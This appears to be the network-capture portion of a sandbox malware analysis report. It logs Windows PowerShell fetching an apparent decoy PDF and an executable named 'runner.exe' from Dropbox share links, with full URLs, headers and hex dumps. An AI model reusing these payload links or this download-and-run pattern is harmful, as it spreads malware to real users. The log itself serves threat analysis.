6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2024-12-19 12:44:37 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:37 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-19 12:44:37 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-19 12:44:37 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Thu, 19 Dec 2024 12:44:37 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f477c2d8bba78e7-EWR alt-svc: h3=":443"; ma=86400
2024-12-19 12:44:37 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0f 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom()

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:38 UTC	246	OUT	GET /scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com Connection: Keep-Alive
2024-12-19 12:44:39 UTC	3872	IN	HTTP/1.1 200 OK Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://.dropboxusercontent.com/p/hls_master_playlist/ https://.dropboxusercontent.com/p/hls_playlist/ ; media-src https://* blob: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src http [TRUNCATED] Content-Type: text/html; charset=utf-8 Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=ODQzNDczMjM3NjY0Nzg1NDU1MTI5NDczNDA2NDE2NTMzOTIzNTc=; Path=/; Expires=Tue, 18 Dec 2029 12:44:39 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=5nZXox6AKFUijeav3hOSJxBx; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:39 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=5nZXox6AKFUijeav3hOSJxBx; Path=/; Expires=Fri, 19 Dec 2025 12:44:39 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=IHCICkonWc; Path=/; Expires=Fri, 19 Dec 2025 12:44:39 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:39 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Date: Thu, 19 Dec 2024 12:44:39 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store Vary: Accept-Encoding X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 1397dd2c0d3841b89917dcec34ee69d4 Connection: close Transfer-Encoding: chunked
2024-12-19 12:44:39 UTC	591	IN	Data Raw: 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6d 61 65 73 74 72 6f 20 67 6c 6f 62 61 6c 2d 68 65 61 64 65 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0d 0a 36 0d 0a 3c 68 65 61 64 3e 0d 0a 31 39 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 0d 0a 34 31 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 69 6d 61 67 65 69 6e 64 65 78 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 2f 3e 0a 0d 0a 34 37 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 Data Ascii: 64<!DOCTYPE html><html class="maestro global-header" xmlns="http://www.w3.org/1999/xhtml" lang="en">6<head>19<meta charset="utf-8" />41<meta content="noindex, nofollow, noimageindex" name="robots" />47<meta content="width=device-widt
2024-12-19 12:44:39 UTC	358	IN	Data Raw: 61 37 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6a 73 2f 63 6f 6d 6d 65 6e 74 73 32 2f 69 6e 64 65 78 2d 76 66 6c 51 64 76 55 48 75 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 33 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 Data Ascii: a7<link rel="preload" href="https://cfl.dropboxstatic.com/static/js/comments2/index-vflQdvUHu.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b3<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/stat
2024-12-19 12:44:39 UTC	216	IN	Data Raw: 64 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 79 70 65 73 63 72 69 70 74 2f 63 6f 6d 70 6f 6e 65 6e 74 5f 6c 69 62 72 61 72 69 65 73 2f 64 69 67 2d 65 78 70 65 72 69 6d 65 6e 74 61 6c 2f 73 72 63 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 4d 67 6b 56 33 4b 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a Data Ascii: d2<link rel="preload" href="https://cfl.dropboxstatic.com/static/typescript/component_libraries/dig-experimental/src/index.web-vflMgkV3K.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>
2024-12-19 12:44:39 UTC	1326	IN	Data Raw: 63 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 6d 61 65 73 74 72 6f 5f 61 70 70 73 68 65 6c 6c 5f 73 74 79 6c 65 73 2d 76 66 6c 66 4e 4e 4c 56 35 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 63 33 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 Data Ascii: c2<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>c3<link rel="preload" href="https://cfl.dropboxstatic
2024-12-19 12:44:39 UTC	974	IN	Data Raw: 62 39 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 67 6f 6f 67 6c 65 5f 6f 6e 65 5f 74 61 70 2d 76 66 6c 70 39 58 44 4c 4a 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 62 35 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 Data Ascii: b9<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/google_one_tap-vflp9XDLJ.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>b5<link rel="preload" href="https://cfl.dropboxstatic.com/stat
2024-12-19 12:44:39 UTC	206	IN	Data Raw: 63 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65 72 2f 73 74 61 74 69 63 2f 63 73 73 2f 61 62 75 73 65 2f 66 69 6e 67 65 72 70 72 69 6e 74 6a 73 5f 63 6f 6d 70 6f 6e 65 6e 74 2d 76 66 6c 54 69 7a 41 6b 66 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a Data Ascii: c8<link rel="preload" href="https://cfl.dropboxstatic.com/static/metaserver/static/css/abuse/fingerprintjs_component-vflTizAkf.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>
2024-12-19 12:44:39 UTC	1311	IN	Data Raw: 64 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 74 79 70 65 73 63 72 69 70 74 2f 63 6f 6d 70 6f 6e 65 6e 74 5f 6c 69 62 72 61 72 69 65 73 2f 64 77 67 2d 63 6f 6d 70 6f 6e 65 6e 74 73 2f 73 72 63 2f 69 6e 64 65 78 2e 77 65 62 2d 76 66 6c 32 66 54 32 48 63 2e 63 73 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 61 73 3d 22 73 74 79 6c 65 22 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 22 64 62 78 5f 65 64 69 73 6f 6e 5f 70 61 67 65 5b 72 65 71 75 65 73 74 65 64 5f 63 73 73 5d 22 2f 3e 0a 0d 0a 36 65 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 77 34 56 49 44 58 61 50 56 78 79 78 44 58 46 56 6b 72 79 33 6b Data Ascii: d0<link rel="preload" href="https://cfl.dropboxstatic.com/static/typescript/component_libraries/dwg-components/src/index.web-vfl2fT2Hc.css" crossorigin as="style" data-loader="dbx_edison_page[requested_css]"/>6e<script nonce="2w4VIDXaPVxyxDXFVkry3k
2024-12-19 12:44:39 UTC	11	IN	Data Raw: 36 0d 0a 3c 62 6f 64 79 3e 0d 0a Data Ascii: 6<body>
2024-12-19 12:44:40 UTC	4104	IN	Data Raw: 31 30 30 30 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 32 77 34 56 49 44 58 61 50 56 78 79 78 44 58 46 56 6b 72 79 33 6b 4e 4d 6d 44 77 3d 22 3e 77 69 6e 64 6f 77 2e 5f 5f 53 45 52 56 45 44 5f 42 59 5f 45 44 49 53 4f 4e 5f 57 45 42 5f 53 45 52 56 45 52 5f 5f 20 3d 20 74 72 75 65 3b 0a 76 61 72 20 72 65 71 75 69 72 65 43 6f 6e 66 69 67 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 22 2c 20 22 77 61 69 74 53 65 63 6f 6e 64 73 22 3a 20 33 30 2c 20 22 70 61 74 68 73 22 3a 20 7b 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 62 75 73 65 5f 66 75 6e 63 61 Data Ascii: 1000<script nonce="2w4VIDXaPVxyxDXFVkry3kNMmDw=">window.__SERVED_BY_EDISON_WEB_SERVER__ = true;var requireConfig = {"baseUrl": "https://cfl.dropboxstatic.com/", "waitSeconds": 30, "paths": {"atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_abuse_funca
2024-12-19 12:44:40 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 6f 6e 73 5f 64 6f 77 6e 6c 6f 61 64 5f 61 70 70 5f 6d 6f 64 61 6c 5f 6d 6f 64 61 6c 2d 76 66 6c 34 61 6e 79 6e 33 22 2c 20 22 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f 6e 5f 64 61 74 61 5f 73 6c 69 63 65 73 22 3a 20 22 73 74 61 74 69 63 2f 61 74 6c 61 73 2f 66 69 6c 65 5f 76 69 65 77 65 72 2f 73 63 6c 5f 6f 62 6f 65 5f 66 69 6c 65 5f 62 75 6e 64 6c 65 5f 61 6d 64 2f 64 69 73 74 2f 63 5f 61 63 74 69 76 61 74 69 6f 6e 5f 64 61 Data Ascii: 4000static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_actions_download_app_modal_modal-vfl4anyn3", "atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activation_data_slices": "static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_activation_da

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:43 UTC	212	OUT	GET /scl/fi/uv9rtex94bi18x6hfwnvm/runner.exe?rlkey=ohh5enlv6dylr9jqxqwsffkja&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-19 12:44:44 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; connect-src https://* ws://127.0.0.1:/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://.purple.officeapps.live-int.com https://officeapps-df.live.com https://.officeapps-df.live.com https://officeapps.live.com https://.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://h [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc80703d35970dc7916212c2d7a8.dl.dropboxusercontent.com/cd/0/get/Cghd1jtLzGlJHKX-9xdPSYuTZVa37wT-hKvzNwSKnDfcuTKM7PpJ3fe1T3Rhm5pJVOamwDQ01obtQghBpb5sSp1qX3zxHKKcvFL8SbBiC1Bb6wiCWr5k1eO0o7hRyobnrH005C9TEHaeAXCntddfSkcf/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTc3ODcwMDAyMjA1Mzk4NzYxMjUxNjE4OTg0NDQyODYxMjYzNzE1; Path=/; Expires=Tue, 18 Dec 2029 12:44:43 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=b-hb4D0JMARcTtkSNSrQFK19; Path=/; Domain=dropbox.com; Expires=Fri, 19 Dec 2025 12:44:43 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=b-hb4D0JMARcTtkSNSrQFK19; Path=/; Expires=Fri, 19 Dec 2025 12:44:43 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=xe1-XdX9mI; Path=/; Expires=Fri, 19 Dec 2025 12:44:43 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Tue, 18 Dec 2029 12:44:43 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Thu, 19 Dec 2024 12:44:43 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 31e19386791c4634ab1fa4fd1b86a221 Connection: close
2024-12-19 12:44:44 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-19 12:44:44 UTC	1004	OUT	GET /page_success/end?edison_page_name=scl_oboe_file&path=%2Fscl%2Ffi%2Fdgiur64vawmdx9alqw6et%2FLewis-Silkin-LLP.pdf&request_id=d23cbb1880f84f85afefc10443038bea&time=1734612274 HTTP/1.1 Host: www.dropbox.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.dropbox.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: gvc=MzEwMjM3MzU2NTk3NjIwNDU2OTE5MDY3OTg3NjQ5NTA1MTQ4ODM4; t=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-js_csrf=HdS8vQAOgoo2pdq3Kdn8X0eJ; __Host-ss=0FAEIkEix0; locale=en_GB
